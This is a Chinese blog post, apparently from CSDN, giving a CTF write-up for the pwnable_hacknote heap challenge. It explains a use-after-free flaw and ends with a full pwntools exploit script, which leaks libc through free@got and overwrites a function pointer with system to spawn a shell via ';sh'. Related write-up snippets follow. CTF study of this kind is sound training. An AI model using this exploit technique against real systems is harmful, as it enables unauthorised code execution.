pwnable_hacknote

最新推荐文章于 2024-01-29 02:22:19 发布
原创 最新推荐文章于 2024-01-29 02:22:19 发布 · 520 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #wp #python #网络安全 #信息安全

本文介绍了一道名为Hacknote的CTF题目,通过利用堆内存管理中的Use After Free(UAF)漏洞来泄露libc地址,并最终获取shell。文章详细解释了漏洞原理及利用步骤。

pwnable_hacknote

使用checksec查看:
在这里插入图片描述

开启了Canary和栈不可执行,没有开启PIE。

先运行一下看看:
在这里插入图片描述

看到菜单,应该是一道堆题了,放进IDA中查看:
在这里插入图片描述

这里我已经将函数重命名了,接下来分步看:

sub_8048956()
在这里插入图片描述

  • 对应menu(),略过

sub_8048646()
在这里插入图片描述

  • ptr[i] = malloc(8u);:程序首先会自动创建一个0x8大小的chunk
  • *(_DWORD *)ptr[i] = puts_0;:puts_0内容是return puts(*(const char **)(a1 + 4));,这个函数作用是puts
  • v0 = ptr[i];:存放puts_0的地址
  • v0[1] = malloc(size);:存放用户创建的chunk的地址
  • 对应add()

sub_80487D4()
在这里插入图片描述

  • free(*((void **)ptr[v1] + 1)); free(ptr[v1]);:先释放用户创建的chunk再释放程序自动创建的chunk,没有清空指针
  • 存在UAF

sub_80488A5()
在这里插入图片描述

  • (*(void (__cdecl **)(void *))ptr[v1])(ptr[v1]);:调用puts_0输出内容

题目思路

  • 存在UFA,利用该漏洞泄露libc
  • puts_0修改为system@got
  • 执行show()就相当于执行system('/bin/sh')

步骤解析

首先创建两个chunk:chunk0、chunk1,大小为0x18,不和程序自动创建的chunk大小相同就行

在这里插入图片描述

接着将两个chunk都free掉,申请0x8大小的一个chunk,这样就能将程序创建的chunk0和chunk1给申请过来,申请时填入的内容会覆盖puts_0和用户创建chunk0的地址

所以这里需要填上puts_0地址,和free@got地址

调用puts_0时就会输出free@got的真实地址

在这里插入图片描述

得到free@got的地址之后就可以计算出system@got的地址。

free掉chunk2在重新申请

同样的申请时填入的内容会覆盖puts_0和用户创建chunk0的地址

此时将puts_0替换为system@got用户创建chunk0的地址替换为;sh\x00即可getshell

在这里插入图片描述

这里使用;sh\x00是因为content的内容是system@got+;sh\x00,首先执行sysstem(system@got)再去执行sysstem(';sh\x00')分号是为了让前面语句结束后执行后面语句

完整exp

from pwn import *

#start 
r = remote("node4.buuoj.cn",25285)
# r = process("../buu/pwnable_hacknote")
elf = ELF("../buu/pwnable_hacknote")
libc = ELF("../buu/ubuntu16(32).so")
context.log_level = 'debug'

def add(size,content):
    r.sendlineafter("choice :",'1')
    r.sendlineafter("size :",str(size))
    r.sendlineafter("Content :",content)

def delete(idx):
    r.sendlineafter("choice :",'2')
    r.sendlineafter("Index :",str(idx))

def show(idx):
    r.sendlineafter("choice :",'3')
    r.sendlineafter("Index :",str(idx))


#params
free_got = elf.got['free']


#attack
add(0x18,'MMMM')
add(0x18,'MMMM')
# gdb.attach(r)
delete(0)
delete(1)

payload = p32(0x804862B) + p32(free_got)
add(0x8,payload)
# gdb.attach(r)

show(0)
free_addr = u32(r.recv(4))

#libc
base_addr = free_addr - libc.symbols['free']
system_addr = base_addr + libc.symbols['system']

delete(2)
payload = p32(system_addr) + b';sh\x00'
add(0x8,payload)
# gdb.attach(r)
show(0)

r.interactive()
pwnable_hacknote_WP
weixin_56434818的博客
03-01 973
pwnable_hacknote_WP 文章目录pwnable_hacknote_WP检查保护分析ELFAdd noteDelete notePrint note利用思路exp 检查保护 ​ i386架构,RELRO半开,开了Canary和NX,没开PIE。 分析ELF 先跑一下 类似菜单的程序,有增、删、查的操作。 IDA反编译后发现主函数主要就是根据选项选择菜单内相应功能的作用,若输入范围之外的数字则会出现错误提示并重新选择。(因为主函数逻辑不是很复杂所以这里就不贴反编译出来的代码了) Add no
pwnable.tw——hacknote分析
Eagle_hwei的博客
02-24 538
hacknote的题目分析 2020-02-2421:22:47 by hawkJW 题目附件、ida文件及wp链接   这是一道比较经典的题目,所以稍微记录一下   1.  程序流程总览 首先,还是老规矩,看一下保护情况   可以看出来,PIE没有开启,可以修改got表,其余基本上都开启了,保护程度一般吧。下面我们来看一下程序的具体流程吧。 没什么好说的,还是比较经典的...
[BUUCTF]-PWN:pwnable_hacknote解析
2301_79326813的博客
01-29 515
先看保护32位,没开pie,got表可修改看ida总的来说就是alloc创建堆块,free释放堆块,show打印堆块内容但alloc处的函数比较特别,他会先申请一个0x8大小的堆来存放与puts相关的指针。
BUUCTF-PWN-pwnable_hacknote-UAF
Rt1Text的博客
07-10 1172
标准的菜单模式canary和NX保护 2.sub_80487D4() 3.sub_80488A5() 利用思路 泄露libc,调用system,执行bin/sh/,获取shellprint note可以打印泄露地址传入该函数的参数是note结构体自身,无法直接传入字符串“\bin\sh”,原来的note_puts(arg0)是对puts(arg0+4)的封装,而现在的system(arg0)中arg0并不指向字符串而指向system的地址,所以这里需要system参数截断,system
BUUCTF-UAF漏洞 pwnable_hacknote
weixin_45441024的博客
05-21 612
BUUCTF-UAF漏洞 pwnable_hacknote 好久不学习pwn了,今天学习突然就开窍了,开心,好像离大神又近了一步 就不静态分析了,直接动态分析 首先创建两个大小为0x80的堆快,结构如图所示,可以看到每个堆块包含了两个部分 然后我们释放这两个堆块,可以看到被存放进了fastbin中 之后我们创建一个payload,0x8个大小的, from pwn import * from LibcSearcher import * def add(size, content): print(
[BUUCTF]PWN——pwnable_hacknote
mcmuyanga的博客
01-13 1681
pwnable_hacknote 附件 步骤: 例行检查,32位程序,开启了nx和canary保护 本地试运行看一下大概的情况,熟悉的堆的菜单 32位ida载入 add() gdb看一下堆块的布局更方便理解 delete() show() 利用思路:使用uaf泄露libc,计算system,执行system(‘/bin/sh’)获取shell 泄露libc print_note的打印功能可以帮助泄露地址。 先add chunk0,add chunk1,大小都为0x80。 add(0x
pwnable.tw——hacknote
40KO的博客
02-24 937
很少做pwn,之前也只懂点rop,现在跟着练练pwn的堆利用吧,pwnable.tw上的一题hacknote,比较纯粹的uaf题目,还好不久前看了点glibc内存管理的东西,可以派上用场了。 逆向很轻松,那为什么不直接给源码呢。。。根据add_note函数很容易了解note的结构体特征 unsigned int add_node() { note *v0; // ebx signed...
pwnable.tw之hacknote
qq_35429581的博客
10-13 3029
uaf漏洞产生的主要原因是释放了一个堆块后,并没有将该指针置为NULL,这样导致该指针处于悬空的状态(有的地方翻译为迷途指针),同样被释放的内存如果被恶意构造数据,就有可能会被利用。 再怎么表述起始还不如真的拿一道题自己调自己看内存看堆状态来的好理解。这也是我觉得ctf-pwn的意义所在,可以把一些漏洞抽象出来以题的形式,作为学习这方面的一个抓手。 此篇尽量做的细致基础,但仍然假设读者已经初步
pwnable.tw hacknote
weixin_30284355的博客
03-22 156
产生漏洞的原因是free后chunk未置零 unsigned int sub_80487D4() { int index; // [esp+4h] [ebp-14h] char buf; // [esp+8h] [ebp-10h] unsigned int v3; // [esp+Ch] [ebp-Ch] v3 = __readgsdword(0x14u); ...
什么是私有地址?如何分类?
热门推荐
qq_44047479的博客
10-30 3万+
什么是私有地址?如何分类? 在现在的网络中,IP地址分为公网IP地址和私有IP地址。 公网IP是在Internet使用的IP地址,而私有IP地址则是在局域网中使用的IP地址。 私有IP地址是一段保留的IP地址。只使用在局域网中,无法在Internet上使用。 当私有网络内的主机要与位于公网上的主机进行通讯时必须经过地址转换,将其私有地址转换为合法公网地址才能对外访问。 NAT-Network Address Translation 网络地址转换 所谓的私有地址就是在互联网上不使用,而被用在局域网络中的地址
pwnable.tw_hacknote_uaf利用
Jc
07-19 611
一道大家都说入uaf比较好的例题,将自己学习的uaf的历程记录一下,来自某大佬一句励志的话 解题思路 1. 查看文件信息,安全机制 2. IDA审计 3. 分析漏洞点 4. 编写EXP 1.基本信息 安全机制 运行 IDA审计 1.add 2.del 3.print ...
buuoj刷题记录 - pwnable_hacknote
qq_34010404的博客
03-19 378
查看程序保护: 拖进IDA分析一下, Add函数正常,先创建八个字节的内存 struct Node{ { void* func_addr; void* content; } 然后根据输入的size开辟相应大小的内存 问题存在于DelNote函数中,free后没有置0 看一下PrintNote函数: 根据八个字节的前四个字节调用对应的函数,并把这个八个字节的首地址作为参数 若Note被free后,还是可以调用Print函数的,由于不确定func_addr是什么,所以会出现问题. 构造方法: 先Add两
pwnable.tw hacknote write up
qq_43189757的博客
09-08 358
程序分析: 程序有四个操作: 1.Add note 2.Delete note 3.Print note 4.Exit 1.Add note 在bss段中存放note的指针,每一个note 包含两个堆块,add的过程中第一个堆块的数据区的开始四字节存放调用puts的函数地址(0x804862b),随后四个字节存放后面存放content 的堆块的地址 2.Delete note 漏洞点发生在Dele...
持续更新 BUUCTF——PWN(二)
weixin_41748164的博客
12-14 767
buuctf pwn 第三页
pwnable.tw记录之applestore
qq_35429581的博客
10-31 1522
耐下心用ida分析: 主要功能函数handler: create函数malloc一块16字节的内存,分别存放:char* name,int price,struct * bk ,struct * fd   ,由insert()函数将当前商品的结构体插入链表尾部。链表的起始位置记录在全局变量 myCart(0x0804B068)中。 delete函数进行链表的拆卸: 一开始觉
pwn hacknote
最新发布
05-21
HackNote 是一道非常经典的 pwn 题目,其难度较为适中,适合初学者进行练习。其主要思路是通过堆溢出来实现 getshell。...如果您对 HackNote 题目感兴趣,可以在一些在线平台上进行尝试,比如 Pwnable.kr 等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值